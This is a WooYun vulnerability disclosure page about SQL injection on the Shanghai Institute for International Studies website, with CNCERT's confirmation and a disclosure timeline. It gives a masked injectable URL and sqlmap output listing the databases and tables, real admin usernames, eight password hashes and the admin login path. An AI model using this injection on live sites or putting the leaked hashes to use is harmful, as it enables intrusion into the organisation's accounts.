当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137846

漏洞标题:上海国际问题研究院SQL注射/管理账号爆出/影响中英文双站点

相关厂商:cncert国家互联网应急中心

漏洞作者: 冷白开。

提交时间:2015-09-01 21:51

修复时间:2015-10-18 17:24

公开时间:2015-10-18 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-03: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-13: 细节向核心白帽子及相关领域专家公开
2015-09-23: 细节向普通白帽子公开
2015-10-03: 细节向实习白帽子公开
2015-10-18: 细节向公众公开

简要描述:

上海国际问题研究院SQL注射/管理账号爆出/影响中英文双站点

详细说明:

首先是注入点一只:

http://**.**.**.**:80//index.php?a=init&c=index&cid=1&m=search&mid=13&q=1&siteid=1&typeid=54

贴图证明,数据库简单明了,中文英文,目测都差不多哦~~

1.png

接下来数据大放送

available databases [3]:
[*] information_schema
[*] siis
[*] siis_en
Database: siis
[130 tables]
+-----------------------------------+
| v9_admin                          |
| v9_admin_panel                    |
| v9_admin_role                     |
| v9_admin_role_priv                |
| v9_announce                       |
| v9_attachment                     |
| v9_attachment_index               |
| v9_badword                        |
| v9_block                          |
| v9_block_history                  |
| v9_block_priv                     |
| v9_cache                          |
| v9_category                       |
| v9_category_priv                  |
| v9_collection_content             |
| v9_collection_history             |
| v9_collection_node                |
| v9_collection_program             |
| v9_comment                        |
| v9_comment_check                  |
| v9_comment_data_1                 |
| v9_comment_setting                |
| v9_comment_table                  |
| v9_content_check                  |
| v9_copyfrom                       |
| v9_datacall                       |
| v9_dbsource                       |
| v9_download                       |
| v9_download_data                  |
| v9_downservers                    |
| v9_extend_setting                 |
| v9_favorite                       |
| v9_hits                           |
| v9_ipbanned                       |
| v9_keylink                        |
| v9_keyword                        |
| v9_link                           |
| v9_linkage                        |
| v9_log                            |
| v9_member                         |
| v9_member_group                   |
| v9_member_internal                |
| v9_member_menu                    |
| v9_member_verify                  |
| v9_member_vip                     |
| v9_menu                           |
| v9_message                        |
| v9_message_data                   |
| v9_message_group                  |
| v9_model                          |
| v9_model_field                    |
| v9_module                         |
| v9_mood                           |
| v9_news                           |
| v9_news_data                      |
| v9_page                           |
| v9_pay_account                    |
| v9_pay_payment                    |
| v9_pay_spend                      |
| v9_picture                        |
| v9_picture_data                   |
| v9_plugin                         |
| v9_plugin_var                     |
| v9_position                       |
| v9_position_data                  |
| v9_poster                         |
| v9_poster_201301                  |
| v9_poster_201302                  |
| v9_poster_201306                  |
| v9_poster_201310                  |
| v9_poster_201401                  |
| v9_poster_space                   |
| v9_queue                          |
| v9_release_point                  |
| v9_search                         |
| v9_search_keyword                 |
| v9_session                        |
| v9_siis_center                    |
| v9_siis_center_data               |
| v9_siis_event                     |
| v9_siis_event_data                |
| v9_siis_exam                      |
| v9_siis_exam_score                |
| v9_siis_global_review             |
| v9_siis_global_review_data        |
| v9_siis_international_expert      |
| v9_siis_international_expert_data |
| v9_siis_news                      |
| v9_siis_news_data                 |
| v9_siis_publication_bg            |
| v9_siis_publication_bg_data       |
| v9_siis_publication_book          |
| v9_siis_publication_book_data     |
| v9_siis_publication_paper         |
| v9_siis_publication_paper_data    |
| v9_siis_publication_report        |
| v9_siis_publication_report_data   |
| v9_siis_publication_review        |
| v9_siis_publication_review_data   |
| v9_siis_review                    |
| v9_siis_review_data               |
| v9_siis_video                     |
| v9_siis_video_data                |
| v9_site                           |
| v9_sms_report                     |
| v9_special                        |
| v9_special_c_data                 |
| v9_special_content                |
| v9_sphinx_counter                 |
| v9_sso_admin                      |
| v9_sso_applications               |
| v9_sso_members                    |
| v9_sso_messagequeue               |
| v9_sso_session                    |
| v9_sso_settings                   |
| v9_tag                            |
| v9_template_bak                   |
| v9_times                          |
| v9_type                           |
| v9_urlrule                        |
| v9_video                          |
| v9_video_content                  |
| v9_video_data                     |
| v9_video_store                    |
| v9_vote_data                      |
| v9_vote_option                    |
| v9_vote_subject                   |
| v9_wap                            |
| v9_wap_type                       |
| v9_workflow                       |
+-----------------------------------+
Database: siis
Table: v9_admin
[11 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| card          | varchar(255)          |
| email         | varchar(40)           |
| encrypt       | varchar(6)            |
| lang          | varchar(6)            |
| lastloginip   | varchar(15)           |
| lastlogintime | int(10) unsigned      |
| password      | varchar(32)           |
| realname      | varchar(50)           |
| roleid        | smallint(5)           |
| userid        | mediumint(6) unsigned |
| username      | varchar(20)           |
+---------------+-----------------------+
Database: siis
Table: v9_admin
[8 entries]
+--------------+
| username     |
+--------------+
| fuxinliang   |
| fwg          |
| gjzw         |
| gjzz         |
| phpcms       |
| siis         |
| yangli       |
| zhangjianmin |
+--------------+

操蛋的密码解密不出,没钱玩

2.png

[18:47:05] [INFO] retrieved: 0190258ba3c19e7d431901d345cd937c
[18:47:05] [INFO] retrieved: 1074e1371a96961abbfbb5a504b079dc
[18:47:05] [INFO] retrieved: 450359b21ece103d465d827b426915ad
[18:47:06] [INFO] retrieved: 5ac340d54e1e9abc355b7d96680c73d4
[18:47:06] [INFO] retrieved: 647ef8df39f6c795f162e6d04f9ee42d
[18:47:06] [INFO] retrieved: 6ae7e496d01fa2fe94263f01fbba748e
[18:47:06] [INFO] retrieved: c63ed4c66d6df526e2a3d0c9ed32a82a
[18:47:07] [INFO] retrieved: c8c75e275551cb93fec2bb1e377ec56a


谷歌到后台地址,你们研究吧,么么哒

http://**.**.**.**/index.php?m=admin&c=index&a=login&pc_hash=

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-09-03 17:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论